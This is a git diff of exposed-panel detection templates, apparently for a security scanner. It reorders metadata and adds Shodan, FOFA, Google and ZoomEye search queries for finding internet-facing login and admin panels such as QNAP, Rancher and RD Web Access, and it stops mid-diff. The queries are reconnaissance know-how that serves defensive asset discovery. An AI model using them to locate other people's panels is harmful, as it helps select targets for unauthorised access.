b/http/exposed-panels/pulsar360-admin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Pulsar Admin" - verified: true tags: panel,pulsar360,pulsar,admin http: diff --git a/http/exposed-panels/pulse-secure-version.yaml b/http/exposed-panels/pulse-secure-version.yaml index 282aa5f4e3..c58330421e 100644 --- a/http/exposed-panels/pulse-secure-version.yaml +++ b/http/exposed-panels/pulse-secure-version.yaml @@ -8,8 +8,9 @@ info: cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: pulse_connect_secure vendor: pulsesecure + product: pulse_connect_secure + shodan-query: cpe:"cpe:2.3:a:pulsesecure:pulse_connect_secure" tags: pulse,panel,pulsesecure http: diff --git a/http/exposed-panels/puppetboard-panel.yaml b/http/exposed-panels/puppetboard-panel.yaml index f8536b0e8b..25358ccd59 100644 --- a/http/exposed-panels/puppetboard-panel.yaml +++ b/http/exposed-panels/puppetboard-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Puppetboard" - verified: true tags: panel,puppet,exposure http: diff --git a/http/exposed-panels/pure-storage-login.yaml b/http/exposed-panels/pure-storage-login.yaml index 28fe448da9..ea7dda9514 100644 --- a/http/exposed-panels/pure-storage-login.yaml +++ b/http/exposed-panels/pure-storage-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:purestorage:purity:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: purity - shodan-query: http.title:"Pure Storage Login" vendor: purestorage + product: purity + shodan-query: + - http.title:"Pure Storage Login" + - http.title:"pure storage login" + fofa-query: title="pure storage login" + google-query: intitle:"pure storage login" tags: panel,purestorage http: diff --git a/http/exposed-panels/pyload-panel.yaml b/http/exposed-panels/pyload-panel.yaml index 21a21fdde3..12b23abecc 100644 --- a/http/exposed-panels/pyload-panel.yaml +++ b/http/exposed-panels/pyload-panel.yaml @@ -11,11 +11,23 @@ info: classification: cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: pyload - shodan-query: title:"Login - pyLoad" - vendor: pyload verified: true + max-request: 2 + vendor: pyload + product: pyload + shodan-query: + - title:"Login - pyLoad" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - body="pyload" + - title="login - pyload" + - title="pyload" + google-query: + - intitle:"pyload" + - intitle:"login - pyload" + zoomeye-query: app:"pyload" tags: panel,pyload,login http: diff --git a/http/exposed-panels/pypicloud-panel.yaml b/http/exposed-panels/pypicloud-panel.yaml index e0cfe50f04..55719bbaf7 100644 --- a/http/exposed-panels/pypicloud-panel.yaml +++ b/http/exposed-panels/pypicloud-panel.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intext:pypicloud max-request: 1 + google-query: intext:pypicloud tags: panel,pypicloud http: diff --git a/http/exposed-panels/qBittorrent-panel.yaml b/http/exposed-panels/qBittorrent-panel.yaml index 4b2235e7a5..4813473983 100644 --- a/http/exposed-panels/qBittorrent-panel.yaml +++ b/http/exposed-panels/qBittorrent-panel.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:a:qbittorrent:qbittorrent:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: qbittorrent - shodan-query: title:"qbittorrent" - vendor: qbittorrent verified: true + max-request: 1 + vendor: qbittorrent + product: qbittorrent + shodan-query: + - title:"qbittorrent" + - http.title:"qbittorrent" + fofa-query: title="qbittorrent" + google-query: intitle:"qbittorrent" tags: panel,qbittorrent,detect http: diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml index 9763758ab3..f582980a4d 100644 --- a/http/exposed-panels/qdpm-login-panel.yaml +++ b/http/exposed-panels/qdpm-login-panel.yaml @@ -7,11 +7,12 @@ info: classification: cpe: cpe:2.3:a:qdpm:qdpm:*:*:*:*:*:*:*:* metadata: + verified: "true" max-request: 2 + vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 - vendor: qdpm - verified: "true" + fofa-query: icon_hash=762074255 tags: panel,qdpm,login http: diff --git a/http/exposed-panels/qlik-sense-server.yaml b/http/exposed-panels/qlik-sense-server.yaml index d2765b1bcb..c79744cfba 100644 --- a/http/exposed-panels/qlik-sense-server.yaml +++ b/http/exposed-panels/qlik-sense-server.yaml @@ -13,12 +13,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:qlik:qlik_sense:*:*:*:*:windows:*:*:* metadata: - fofa-query: app="Qlik-Sense" - max-request: 2 - product: qlik_sense - shodan-query: http.title:"Qlik-Sense" - vendor: qlik verified: true + max-request: 2 + vendor: qlik + product: qlik_sense + shodan-query: + - http.title:"Qlik-Sense" + - http.favicon.hash:-74348711 + - http.html:"qlik" + - http.title:"qlik-sense" + fofa-query: + - app="Qlik-Sense" + - app="qlik-sense" + - title="qlik-sense" + - icon_hash=-74348711 + - body="qlik" + google-query: intitle:"qlik-sense" tags: panel,qlik http: diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index 7fdb0a05d8..8b0f270f0b 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -1,19 +1,19 @@ id: qlikview-accesspoint-panel -info: - name: QlikView AccessPoint Login Panel - Detect - author: righettod - severity: info - description: | - QlikView AccessPoint login panel was detected. - reference: - - https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm - metadata: - verified: true - max-request: 1 - shodan-query: title:"QlikView - AccessPoint" - tags: panel,qlikview,login,detect - +info: + name: QlikView AccessPoint Login Panel - Detect + author: righettod + severity: info + description: | + QlikView AccessPoint login panel was detected. + reference: + - https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm + metadata: + verified: true + max-request: 1 + shodan-query: title:"QlikView - AccessPoint" + tags: panel,qlikview,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/qmail-admin-login.yaml b/http/exposed-panels/qmail-admin-login.yaml index 0b10804de5..20e62f256f 100644 --- a/http/exposed-panels/qmail-admin-login.yaml +++ b/http/exposed-panels/qmail-admin-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:qmail_project:qmail:*:*:*:*:*:*:*:* metadata: - max-request: 5 - product: qmail - shodan-query: title:"QmailAdmin" - vendor: qmail_project verified: true + max-request: 5 + vendor: qmail_project + product: qmail + shodan-query: + - title:"QmailAdmin" + - http.title:"qmailadmin" + fofa-query: title="qmailadmin" + google-query: intitle:"qmailadmin" tags: qmail,panel,qmail_project http: diff --git a/http/exposed-panels/qnap/qnap-photostation-panel.yaml b/http/exposed-panels/qnap/qnap-photostation-panel.yaml index 05f966eefc..76e3d4e124 100644 --- a/http/exposed-panels/qnap/qnap-photostation-panel.yaml +++ b/http/exposed-panels/qnap/qnap-photostation-panel.yaml @@ -13,11 +13,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: photo_station - shodan-query: http.title:"Photo Station" - vendor: qnap verified: true + max-request: 1 + vendor: qnap + product: photo_station + shodan-query: + - http.title:"Photo Station" + - http.title:"photo station" + - http.title:"qnap" + - 'content-length: 580 "http server 1.0"' + fofa-query: + - title="photo station" + - title="qnap" + google-query: + - intitle:"qnap" + - intitle:"photo station" tags: panel,photostation,qnap http: diff --git a/http/exposed-panels/qnap/qnap-qts-panel.yaml b/http/exposed-panels/qnap/qnap-qts-panel.yaml index ed97040cbf..0789e3d347 100644 --- a/http/exposed-panels/qnap/qnap-qts-panel.yaml +++ b/http/exposed-panels/qnap/qnap-qts-panel.yaml @@ -13,12 +13,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"QNAP Turbo NAS" inurl:/cgi-bin - max-request: 2 - product: qts - shodan-query: product:"QNAP" - vendor: qnap verified: true + max-request: 2 + vendor: qnap + product: qts + shodan-query: + - product:"QNAP" + - product:"qnap" + - http.title:"qnap turbo nas" inurl:/cgi-bin + google-query: + - intitle:"QNAP Turbo NAS" inurl:/cgi-bin + - intitle:"qnap turbo nas" inurl:/cgi-bin + fofa-query: title="qnap turbo nas" inurl:/cgi-bin tags: panel,qnap,qts http: diff --git a/http/exposed-panels/qualcomm-voip-router.yaml b/http/exposed-panels/qualcomm-voip-router.yaml index de5d931754..c3dd679094 100644 --- a/http/exposed-panels/qualcomm-voip-router.yaml +++ b/http/exposed-panels/qualcomm-voip-router.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Qualcomm-4G-LTE-WiFi-VoIP-Router" max-request: 1 + fofa-query: app="Qualcomm-4G-LTE-WiFi-VoIP-Router" tags: panel,qualcomm,iot,router,voip http: diff --git a/http/exposed-panels/qualtrics-login.yaml b/http/exposed-panels/qualtrics-login.yaml index 8b51bc8d75..0c312b2190 100644 --- a/http/exposed-panels/qualtrics-login.yaml +++ b/http/exposed-panels/qualtrics-login.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,qualtrics http: diff --git a/http/exposed-panels/quantum-scalar-detect.yaml b/http/exposed-panels/quantum-scalar-detect.yaml index 2d52056f18..8c825aa0ff 100644 --- a/http/exposed-panels/quantum-scalar-detect.yaml +++ b/http/exposed-panels/quantum-scalar-detect.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:h:quantum:scalar_i500:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: scalar_i500 vendor: quantum + product: scalar_i500 tags: panel,quantum,scalar http: diff --git a/http/exposed-panels/quilium-panel.yaml b/http/exposed-panels/quilium-panel.yaml index d23c548a92..d096a6f730 100644 --- a/http/exposed-panels/quilium-panel.yaml +++ b/http/exposed-panels/quilium-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.quilium.io/ metadata: + verified: true max-request: 2 shodan-query: http.html:"CMS Quilium" - verified: true tags: panel,quilium,login,detect http: diff --git a/http/exposed-panels/rabbitmq-dashboard.yaml b/http/exposed-panels/rabbitmq-dashboard.yaml index 901dd8948b..63dbb9dda1 100644 --- a/http/exposed-panels/rabbitmq-dashboard.yaml +++ b/http/exposed-panels/rabbitmq-dashboard.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:vmware:rabbitmq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: rabbitmq vendor: vmware + product: rabbitmq + shodan-query: cpe:"cpe:2.3:a:vmware:rabbitmq" tags: panel,rabbitmq,vmware http: diff --git a/http/exposed-panels/racksnet-login.yaml b/http/exposed-panels/racksnet-login.yaml index a322722a71..bf10a82f68 100644 --- a/http/exposed-panels/racksnet-login.yaml +++ b/http/exposed-panels/racksnet-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"My Datacenter - Login" max-request: 1 shodan-query: http.title:"My Datacenter - Login" + google-query: intitle:"My Datacenter - Login" tags: panel,racksnet http: diff --git a/http/exposed-panels/rancher-dashboard.yaml b/http/exposed-panels/rancher-dashboard.yaml index 8b26bb148b..4b5be10947 100644 --- a/http/exposed-panels/rancher-dashboard.yaml +++ b/http/exposed-panels/rancher-dashboard.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:rancher:rancher:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: rancher - shodan-query: http.favicon.hash:-1324930554 - vendor: rancher verified: "true" + max-request: 2 + vendor: rancher + product: rancher + shodan-query: + - http.favicon.hash:-1324930554 + - http.favicon.hash:464587962 + fofa-query: icon_hash=464587962 tags: panel,rancher,dashboard,login http: diff --git a/http/exposed-panels/rancher-panel.yaml b/http/exposed-panels/rancher-panel.yaml index e8e5d64289..31163f52e5 100644 --- a/http/exposed-panels/rancher-panel.yaml +++ b/http/exposed-panels/rancher-panel.yaml @@ -13,11 +13,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:suse:rancher:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: suse product: rancher shodan-query: http.favicon.hash:464587962 - vendor: suse - verified: true + fofa-query: icon_hash=464587962 tags: panel,rancher,kubernetes,devops,cloud,login,suse http: diff --git a/http/exposed-panels/rcdevs-webadm-panel.yaml b/http/exposed-panels/rcdevs-webadm-panel.yaml index 355943bf39..e8a310954c 100644 --- a/http/exposed-panels/rcdevs-webadm-panel.yaml +++ b/http/exposed-panels/rcdevs-webadm-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.rcdevs.com/solutions/ metadata: + verified: true max-request: 4 shodan-query: http.html:"WebADM" - verified: true tags: panel,rcdevs,webadm,login,detect http: diff --git a/http/exposed-panels/rdweb-panel.yaml b/http/exposed-panels/rdweb-panel.yaml index 53fa80a3be..f69b0fd303 100644 --- a/http/exposed-panels/rdweb-panel.yaml +++ b/http/exposed-panels/rdweb-panel.yaml @@ -13,10 +13,13 @@ info: metadata: verified: true max-request: 1 - product: remote_desktop vendor: microsoft - shodan-query: html:"RD Web Access" - tags: panel,login,rdp,web-access,Microsoft,detect + product: remote_desktop + shodan-query: + - html:"RD Web Access" + - http.html:"rd web access" + fofa-query: body="rd web access" + tags: panel,login,rdp,web-access,Microsoft,detect,microsoft http: - method: GET diff --git a/http/exposed-panels/red-lion-panel.yaml b/http/exposed-panels/red-lion-panel.yaml index c18e31bb21..42f9e4c28b 100644 --- a/http/exposed-panels/red-lion-panel.yaml +++ b/http/exposed-panels/red-lion-panel.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,redlion,detect,iot http: diff --git a/http/exposed-panels/redash-panel.yaml b/http/exposed-panels/redash-panel.yaml index adc86732c6..d8fd20f81e 100644 --- a/http/exposed-panels/redash-panel.yaml +++ b/http/exposed-panels/redash-panel.yaml @@ -11,9 +11,10 @@ info: cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: redash product: redash shodan-query: http.favicon.hash:698624197 - vendor: redash + fofa-query: icon_hash=698624197 tags: panel,redash http: diff --git a/http/exposed-panels/redhat/redhat-satellite-panel.yaml b/http/exposed-panels/redhat/redhat-satellite-panel.yaml index 139125fb0f..746d6843c7 100644 --- a/http/exposed-panels/redhat/redhat-satellite-panel.yaml +++ b/http/exposed-panels/redhat/redhat-satellite-panel.yaml @@ -8,9 +8,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"redhat" "Satellite" - verified: true tags: panel,redhat,satellite http: diff --git a/http/exposed-panels/redis-enterprise-panel.yaml b/http/exposed-panels/redis-enterprise-panel.yaml index 1a9d8bff6a..e2659d5355 100644 --- a/http/exposed-panels/redis-enterprise-panel.yaml +++ b/http/exposed-panels/redis-enterprise-panel.yaml @@ -5,9 +5,9 @@ info: author: tess severity: info metadata: + verified: true max-request: 1 shodan-query: title:"Enterprise-Class Redis for Developers" - verified: true tags: panel,redis,enterprise http: diff --git a/http/exposed-panels/redmine-panel.yaml b/http/exposed-panels/redmine-panel.yaml index 79ae5a4b3c..7b2621d2f1 100644 --- a/http/exposed-panels/redmine-panel.yaml +++ b/http/exposed-panels/redmine-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.redmine.org/ metadata: + verified: true max-request: 1 shodan-query: http.html:'content="Redmine' - verified: true tags: panel,redmine,login,detect http: diff --git a/http/exposed-panels/regify-panel.yaml b/http/exposed-panels/regify-panel.yaml index d03cfe144b..2fc30b585d 100644 --- a/http/exposed-panels/regify-panel.yaml +++ b/http/exposed-panels/regify-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.regify.com/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1817615343 - verified: true tags: panel,regify,login,detect http: diff --git a/http/exposed-panels/remedy-axis-login.yaml b/http/exposed-panels/remedy-axis-login.yaml index cda2184d3c..7f718dfddc 100644 --- a/http/exposed-panels/remedy-axis-login.yaml +++ b/http/exposed-panels/remedy-axis-login.yaml @@ -8,9 +8,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"BMC Remedy" - verified: true tags: panel,remedy,bmc http: diff --git a/http/exposed-panels/repetier-server-panel.yaml b/http/exposed-panels/repetier-server-panel.yaml index 03cb455c68..c493a19536 100644 --- a/http/exposed-panels/repetier-server-panel.yaml +++ b/http/exposed-panels/repetier-server-panel.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: repetier-server - shodan-query: title:"Repetier-Server" - vendor: repetier-server verified: true + max-request: 1 + vendor: repetier-server + product: repetier-server + shodan-query: + - title:"Repetier-Server" + - http.title:"repetier-server" + fofa-query: title="repetier-server" + google-query: intitle:"repetier-server" tags: panel,repetier,detect,repetier-server http: diff --git a/http/exposed-panels/reportico-admin-panel.yaml b/http/exposed-panels/reportico-admin-panel.yaml index 1efd50df8c..a7bd437d60 100644 --- a/http/exposed-panels/reportico-admin-panel.yaml +++ b/http/exposed-panels/reportico-admin-panel.yaml @@ -12,11 +12,15 @@ info: classification: cpe: cpe:2.3:a:reportico:reportico:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: reportico - shodan-query: title:"Reportico Administration Page" - vendor: reportico verified: true + max-request: 2 + vendor: reportico + product: reportico + shodan-query: + - title:"Reportico Administration Page" + - http.title:"reportico administration page" + fofa-query: title="reportico administration page" + google-query: intitle:"reportico administration page" tags: panel,reportico,login,detect http: diff --git a/http/exposed-panels/residential-gateway-login.yaml b/http/exposed-panels/residential-gateway-login.yaml index d61c5c8aa9..f493558766 100644 --- a/http/exposed-panels/residential-gateway-login.yaml +++ b/http/exposed-panels/residential-gateway-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Login - Residential Gateway" max-request: 2 shodan-query: http.title:"Login - Residential Gateway" + google-query: intitle:"Login - Residential Gateway" tags: panel http: diff --git a/http/exposed-panels/retool-login.yaml b/http/exposed-panels/retool-login.yaml index 16c0fb7a87..00b2005e78 100644 --- a/http/exposed-panels/retool-login.yaml +++ b/http/exposed-panels/retool-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Retool" - verified: true tags: login,panel,retool http: diff --git a/http/exposed-panels/riseup-panel.yaml b/http/exposed-panels/riseup-panel.yaml index 9bc7db1525..bc64082b30 100644 --- a/http/exposed-panels/riseup-panel.yaml +++ b/http/exposed-panels/riseup-panel.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,riseup http: diff --git a/http/exposed-panels/rocketchat-panel.yaml b/http/exposed-panels/rocketchat-panel.yaml index 6958870e34..cb101df996 100644 --- a/http/exposed-panels/rocketchat-panel.yaml +++ b/http/exposed-panels/rocketchat-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.rocket.chat/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Rocket.Chat" - verified: true tags: panel,rocketchat,login,detect http: diff --git a/http/exposed-panels/rocketmq-console-exposure.yaml b/http/exposed-panels/rocketmq-console-exposure.yaml index f79a0882f2..10c5cf02bc 100644 --- a/http/exposed-panels/rocketmq-console-exposure.yaml +++ b/http/exposed-panels/rocketmq-console-exposure.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: rocketmq - shodan-query: http.title:"RocketMq-console-ng" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: rocketmq + shodan-query: + - http.title:"RocketMq-console-ng" + - http.title:"rocketmq-console-ng" + - http.title:"rocketmq" + fofa-query: + - title="rocketmq-console-ng" + - protocol="rocketmq" + - title="rocketmq" + google-query: + - intitle:"rocketmq" + - intitle:"rocketmq-console-ng" tags: panel,apache http: diff --git a/http/exposed-panels/room-alert-detect.yaml b/http/exposed-panels/room-alert-detect.yaml index 1dd06226bf..a4b8f6cfc5 100644 --- a/http/exposed-panels/room-alert-detect.yaml +++ b/http/exposed-panels/room-alert-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"Room Alert" - verified: true tags: panel,room-alert,avtech http: diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index 3eedf0e4e0..f7eee6a9b8 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Roxy file manager" - max-request: 4 - product: roxy_fileman - vendor: roxyfileman verified: true + max-request: 4 + vendor: roxyfileman + product: roxy_fileman + google-query: + - intitle:"Roxy file manager" + - intitle:"roxy file manager" + shodan-query: http.title:"roxy file manager" + fofa-query: title="roxy file manager" tags: tech,roxy,fileman,panel,roxyfileman http: diff --git a/http/exposed-panels/royalevent-management-panel.yaml b/http/exposed-panels/royalevent-management-panel.yaml index 4b0ab69df4..9c399ad9d4 100644 --- a/http/exposed-panels/royalevent-management-panel.yaml +++ b/http/exposed-panels/royalevent-management-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: royalevent,panel http: diff --git a/http/exposed-panels/ruckus-unleashed-panel.yaml b/http/exposed-panels/ruckus-unleashed-panel.yaml index d674929c0e..c342a316ee 100644 --- a/http/exposed-panels/ruckus-unleashed-panel.yaml +++ b/http/exposed-panels/ruckus-unleashed-panel.yaml @@ -12,11 +12,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:ruckuswireless:unleashed_firmware:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Unleashed Login" max-request: 1 - product: unleashed_firmware - shodan-query: http.title:"Unleashed Login" vendor: ruckuswireless + product: unleashed_firmware + shodan-query: + - http.title:"Unleashed Login" + - http.title:"unleashed login" + google-query: + - intitle:"Unleashed Login" + - intitle:"unleashed login" + fofa-query: title="unleashed login" tags: panel,ruckus,ruckuswireless http: diff --git a/http/exposed-panels/ruckus-wireless-admin-login.yaml b/http/exposed-panels/ruckus-wireless-admin-login.yaml index 1061f105b5..b38636d05a 100644 --- a/http/exposed-panels/ruckus-wireless-admin-login.yaml +++ b/http/exposed-panels/ruckus-wireless-admin-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:ruckuswireless:e510:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: e510 - shodan-query: title:"ruckus" - vendor: ruckuswireless verified: true + max-request: 1 + vendor: ruckuswireless + product: e510 + shodan-query: + - title:"ruckus" + - http.title:"ruckus" + fofa-query: title="ruckus" + google-query: intitle:"ruckus" tags: panel,exposed,ruckus,ruckuswireless http: diff --git a/http/exposed-panels/ruijie/rg-uac-panel.yaml b/http/exposed-panels/ruijie/rg-uac-panel.yaml index bb3232603b..91a79f3065 100644 --- a/http/exposed-panels/ruijie/rg-uac-panel.yaml +++ b/http/exposed-panels/ruijie/rg-uac-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:o:ruijie:rg-uac_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: rg-uac_firmware - shodan-query: http.html:"Get_Verify_Info" vendor: ruijie + product: rg-uac_firmware + shodan-query: + - http.html:"Get_Verify_Info" + - http.html:"get_verify_info" + fofa-query: body="get_verify_info" tags: panel,ruijie,router,firewall http: diff --git a/http/exposed-panels/rundeck-login.yaml b/http/exposed-panels/rundeck-login.yaml index dd369d8bab..e8d6a99d11 100644 --- a/http/exposed-panels/rundeck-login.yaml +++ b/http/exposed-panels/rundeck-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Rundeck" - verified: true tags: panel,rundeck http: diff --git a/http/exposed-panels/rustici-content-controller.yaml b/http/exposed-panels/rustici-content-controller.yaml index fd127c0130..7ec7c023a4 100644 --- a/http/exposed-panels/rustici-content-controller.yaml +++ b/http/exposed-panels/rustici-content-controller.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Rustici Content Controller" - verified: true tags: panel,rustici http: diff --git a/http/exposed-panels/safenet-authentication-panel.yaml b/http/exposed-panels/safenet-authentication-panel.yaml index 0c283dc120..563ee8b221 100644 --- a/http/exposed-panels/safenet-authentication-panel.yaml +++ b/http/exposed-panels/safenet-authentication-panel.yaml @@ -9,10 +9,11 @@ info: reference: - https://cpl.thalesgroup.com/access-management/safenet-trusted-access metadata: + verified: true max-request: 1 shodan-query: http.title:"Self Enrollment" - verified: true tags: panel,safenet,thales,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/sage-panel.yaml b/http/exposed-panels/sage-panel.yaml index e873d1694b..42a37060b8 100644 --- a/http/exposed-panels/sage-panel.yaml +++ b/http/exposed-panels/sage-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:sage:x3:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: x3 - shodan-query: http.title:"Sage X3" vendor: sage + product: x3 + shodan-query: + - http.title:"Sage X3" + - http.title:"sage x3" + fofa-query: title="sage x3" + google-query: intitle:"sage x3" tags: panel,sage,login http: diff --git a/http/exposed-panels/saltstack-config-panel.yaml b/http/exposed-panels/saltstack-config-panel.yaml index 9cbba99df2..d889aef300 100644 --- a/http/exposed-panels/saltstack-config-panel.yaml +++ b/http/exposed-panels/saltstack-config-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"SaltStack Config" - verified: true tags: panel,vmware,login,saltstack http: diff --git a/http/exposed-panels/samba-swat-panel.yaml b/http/exposed-panels/samba-swat-panel.yaml index c75de1b4f5..b133ac7c74 100644 --- a/http/exposed-panels/samba-swat-panel.yaml +++ b/http/exposed-panels/samba-swat-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:samba:samba:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: samba vendor: samba + product: samba tags: panel,samba http: diff --git a/http/exposed-panels/samsung-printer-detect.yaml b/http/exposed-panels/samsung-printer-detect.yaml index bb63debe5b..3aeca076cb 100644 --- a/http/exposed-panels/samsung-printer-detect.yaml +++ b/http/exposed-panels/samsung-printer-detect.yaml @@ -10,10 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:samsung:printer_firmware:*:*:*:*:*:*:*:* metadata: - fofa-query: app="SAMSUNG-Printer" max-request: 1 - product: printer_firmware vendor: samsung + product: printer_firmware + fofa-query: + - app="SAMSUNG-Printer" + - app="samsung-printer" tags: iot,panel,samsung,printer http: diff --git a/http/exposed-panels/sap-cloud-analytics.yaml b/http/exposed-panels/sap-cloud-analytics.yaml index b399fd5dc6..7a6369ca4b 100644 --- a/http/exposed-panels/sap-cloud-analytics.yaml +++ b/http/exposed-panels/sap-cloud-analytics.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"SAP Analytics Cloud" - verified: true tags: panel,sap,cloudanalytics http: diff --git a/http/exposed-panels/sap-netweaver-portal.yaml b/http/exposed-panels/sap-netweaver-portal.yaml index 